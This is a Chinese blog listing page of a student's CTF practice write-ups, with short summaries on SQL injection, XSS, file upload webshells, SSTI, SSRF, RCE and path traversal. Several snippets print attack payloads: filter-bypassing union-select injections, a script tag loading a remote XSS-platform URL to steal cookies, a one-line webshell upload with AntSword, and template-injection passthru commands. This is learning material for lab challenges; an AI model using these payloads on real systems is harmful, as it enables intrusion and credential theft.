自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(27)
  • 收藏
  • 关注

原创 知识点回顾

ssti注入是一种服务端模板注入漏洞,它出现在使用模板引擎的web应用程序中。模板引擎是一种将动态数据与静态模板结合生成的输出工具。如果在构建模板时未正确处理 用户输入,就可能产生ssti。

2026-03-29 22:09:50 363

原创 见面考复现

用一个RSA脚本直接解密就可以了。

2026-03-22 22:36:05 399

原创 第五周作业

按照步骤搭建好靶场后搭建好后就可以开始做题了CSRF(跨站请求伪造),全称为Cross-site request forgery,简单来说,是攻击者利用受害者尚未失效的身份认证信息,诱骗受害者点击恶意链接或含有攻击代码的页面,在受害者不知情的情况下以受害者的身份像服务器发起请求,从而实现非法攻击(改密)。

2026-02-15 19:19:51 1015

原创 第四周作业

先了解一下什么是PE结构:PE文件的全称是Portable Executable,意为可移植的可执行文件,是微软Windows操作系统上广泛使用的程序文件格式(包括间接被执行的文件,如DLL)。在PE文件头的开始位置,紧接着“MZ”之后,通常会有“PE”或“PE\0\0”(即50 45 00 00)这样的字节序列,这是PE文件的真正标识。发现过滤了script,on,scr,data,herf;发现与上一关又所不同的是多了一个\+',单引号'被转义,查了一下相当于''构成了闭合,构造payload:'';

2026-02-08 17:43:21 868

原创 第三周作业

尝试访问下一行nss=-1'/**/ununionion/**/select/**/1,2,3/**/limit/**/1,1#,得到回显2和3;发现flag所在的表为ctftraining,最后就是查询flag在这个表里的列,1'/**/union/**/select/**/1,2,`1`/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)xxx/**/where/**/'1。得到库名,查询表名?

2026-02-01 19:47:06 944

原创 第二周作业

这句话的大致意思是:该文件上传后,所在目录中名字包含jpg的文件将会被当做php代码解析。再上传一个一句话木马,后缀名为jpg上传成功后得到相对路径,最后使用蚁剑链接获取flag。

2026-01-25 19:23:44 754

原创 第一周作业

这题就是简单的rce,打开题目发现是一个GET传参,参数是url;先查看根目录发现flag所在位置,直接查看flag。

2026-01-18 19:04:20 646

原创 PHP反序列化

php是一种流行的服务器端的脚本语言,它提供了大量的内置函数,用于执行各种任务,如字符串操作,文件处理,数据库连接等。序列化:将PHP对象转换为可存储或传输的字符串格式。函数:serialize();会话管理(session)、缓存、数据传输。格式:0:4:"Test":1:{s:3:"var";0:Object(对象);4:类名长度;Test:类名;1:属性数量反序列化:将字符串还原为原始对象。函数:unserialize();反序列化过程是自动化的,且完全由PHP引擎接管。

2025-12-21 23:07:19 991

原创 SSTI题解

SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。php常见的模板:twig,smarty,blade,等python常见的模板有:Jinja2,tornado__dict__ :保存类实例或对象实例的属性变量键值对字典__class__ :返回一个实例所属的类。

2025-12-14 21:40:25 1071

原创 ctfhub SSRF

题目给了提示,让我们尝试访问127.0.0.1的flag.php进入链接后根据提示直接访问flag.php,就可以得到flag了。

2025-12-08 00:28:19 279

原创 ISCTF

下载题目压缩包,打开后发现是一个流量包,打开后根据题目提示,找到那个目标用户IP提交就可以获得flag。

2025-12-08 00:11:31 222

原创 Pctf自我解题记录

这题不是很难,这题考察的是万能密码,我们只需要输入万能密码就行了,输入账号:admin'#;密码:随意。

2025-12-07 22:19:03 503

原创 AWD复现

修改密码之后,我们需要将源码备份并将其导出到自己的电脑上,防止到时候我们修改时导致自己宕机,或是他人攻击自己时,无法恢复(一搬源码位置都在/var/www/html处)找到html文件就可以了。我们进入网站,再URL上输入/admin.php查看一下,进去发现是一个登录界面,这里我们用万能密码就登录进去(如果不行可以尝试一下爆破),admin;链接成功后,我们首先要加固自己网站,先改一下自己密码,输入passwd(这里需要注意输入密码是不会显示明文),也需要去修改一下sql库的密码。

2025-11-30 23:59:17 274

原创 ctfhub-XSS

需要使用XSS平台,我们要先去XSS平台注册一个用户,然后创建一个项目,平台会生成类似以下的Payload:<script src=//xsspt.com/xxxx></script>我们直接将平台给payload输入到第一个输入框就可以得到一串URL将得到的URL输入到第二个输入框,再返回XSS平台查看项目就可以查找到flag了,flag在cookie处。

2025-11-23 11:05:48 265

原创 ctfhub-文件上传

构造一个一句话木马文件进行上传(木马前面可以加一些内容,不然容易被查出报403)上传返回后就可以看到一个相对路径在URL后面加上相对路径,再使用蚁剑上传后,就可以在文件中查找到flag了(密码为自己上传文件所写的post)

2025-11-20 21:48:04 610

原创 CTFHub web-密码口令

这题目标已经很明确了,就是弱口令爆破,直接打开bp进行口令爆破。使用bp的intruder模块,在这里我使用的是sinper攻击(单个攻击),也可以使用集装束炸弹,添加攻击位置,调整一下payload的配置,这里用的是一些弱口令常用的字典(可以自己去github上下载),然后就可以开始攻击了最终在长度为2658处发现了flag(即用户名为admin,密码为123456)。

2025-11-17 20:01:32 321

原创 CTFHub-web-信息泄露(个人题解)

首先我们第一次接触,需先要了解什么是目录遍历,查找有关目录遍历的相关知识,下面是我查找的相关知识:目录遍历(Directory Traversal),也称为路径遍历(Path Traversal),是一种利用应用程序在处理文件或目录操作时对输入验证不严的安全风险。攻击者通过构造特殊的输入(通常包含../这样的序列),。这题是基础题,只是然我们通过url来查找有关flag的文件吗,进入链接,直接点击寻找。

2025-11-11 22:04:20 400

原创 sql-lab(个人题解)

首先判断是否存在sql注入,输入?id=1,回显正常,再输入?id=1';出现报错,说明存在sql注入,且可以判断为单引号闭合;再进行判断是字符型还是数字型注入,先输入?id=1 and 1=2,没有出现报错,说明是字符型注入;接下来,判断数据库的列数,输入?id=1' order by 1--+,一个一个的试,发现by 4--+的时候出现了报错,这说明数据库总共有3列;输入?id=-1' union select 1,2,3--+;回显字段,得知name和password所在的列数;查询数据库的名,输入

2025-11-09 23:43:42 597

原创 青少年CTF(第四届商师大赛个人题解)

file=....//....//....//flag,就得到了flag,这里建议去查找一些目录遍历攻击的相关知识。大致意思就是,可以进行GET传参进行修改分数,核心逻辑:前端将当前游戏分数 obj.score 以 GET 参数形式发送到 flag.php,服务端需校验分数是否满足条件(如达到 2048),若满足则返回 flag。这题很好玩,明面上的好玩,进去发现是我们玩过的小游戏2048,向这方面的题大致思路就是使游戏分数达到给定的分数线,从而得到flag。com=nl /*就可以得到flag了。

2025-10-30 20:33:45 915

原创 青少年CTF(Web)

根据分析源码fetch(`check_score.php?score=${score}`)就可以得到答案了,分数线是10000,我们只需要输入/check_score.php?这题很好玩,口头上的好玩,刚开始我以为是设置一个分数线,达到才能获得flag,查看源码之后发现错了。阅读源码,get请求一个inc参数就可以直接进行文件包含,其实直接访问flag就可以了。打开链接,看到提示GET传参,变量为‘inc’,大多数这种题flag都在根目录!

2025-10-28 21:51:29 161

原创 Bugku 聪明的php

通过分析源代码可以发现这题是php模板注入,发现过滤了许多函数,还好有passthru还可以用,输入?a={if passthru('ls /')}{/if},查看当前目录。发现现在的目录,没有发现flag,但是有一个数字目录,输入?a={if passthru('more /_21400')}{/if}一进入网站就发现一串英文,意思是谁便输入一个参数就可以查看源代码,这里我们输入?因为cat被过滤掉了,所以这里我们使用more代替cat,就可以看见flag了。

2025-10-23 21:14:39 149

原创 RCE(青少年CTF平台)

根据题目所提供的网站可以进行在线编辑,列如ls的:$0<<<$0\<\$\(\($\(\(1\<\<1\)\)\#10011010\)\)\$\(\($\(\(1\<\<1\)\)\#10100011\)\)\>cat /flag对应$'\143\141\164\40\57\146\154\141\147'cmd=$'\143\141\164\40\57\146\154\141\147'就可以得到flag。题目提示为post传参,且变量值为‘a’,输入a=cat /flag,得到flag。

2025-10-21 21:51:43 677

原创 NSSCTF[SWPUCTF 2021 新生赛]include

该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。php://伪协议是php提供的一些输入输出流访问功能,允许访问php的输入输出流,标准输入输出和错误描述符,内存中,磁盘备份的临时文件流,以及可以操作其他读取和写入文件的过滤器。2)http:// 访问HTTP(S)网址。3)ftp:// 访问FTP(S)URL。1)file:// 访问本地文件系统。4)php:// 访问各个输出输入流。8)phar:// PHP归档。

2025-10-09 20:06:20 241

原创 ctfshow 萌新 web 2

这题跟上一题web 1的做法是一样的,老办法仔细阅读代码找到被限制(被过滤掉)的口令从中可发现为'or','+','id',我当时用的是‘~~’绕过这个方法我只用到了web5。

2025-09-08 22:23:33 126

原创 ctfshow 萌新 web2

考察点和web一样,主要还是限制绕过,还是老样子,查看限制内容,然后使用未被过滤掉的口令进行绕过,从中可以看出‘or’,‘+’,‘id’被过滤掉了,可以使用‘~’,‘^’,等,还有很多口令,可自行搜索。

2025-09-08 22:11:30 131

原创 ctfshow web1

例如可能存在其他的参数或者方法可以执行 SQL 注入攻击,从而获取到 `id = 1000` 的结果。1. 尝试绕过限制: 尝试使用其他的参数或方式来绕过限制,例如可能存在其他的参数或者方法可以绕过对 `id` 参数的限制,从而获取到 `id = 1000` 的结果。从代码中可以看出flag在id=1000出,但是输入?4. 绕过参数限制:如果存在对参数的过滤限制,可以尝试绕过这些限制。2. 利用错误消息泄露:如果程序存在错误消息泄露,可以尝试通过构造恶意输入来触发错误,从而获取到更多的信息或者利用漏洞。

2025-09-08 21:52:41 187

原创 [LitCTF 2023]404notfound (初级)的解题过程

通过下载附件到桌面并解压,并通过tools,010Editor,进行搜索CTF。

2024-10-24 20:57:52 358

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除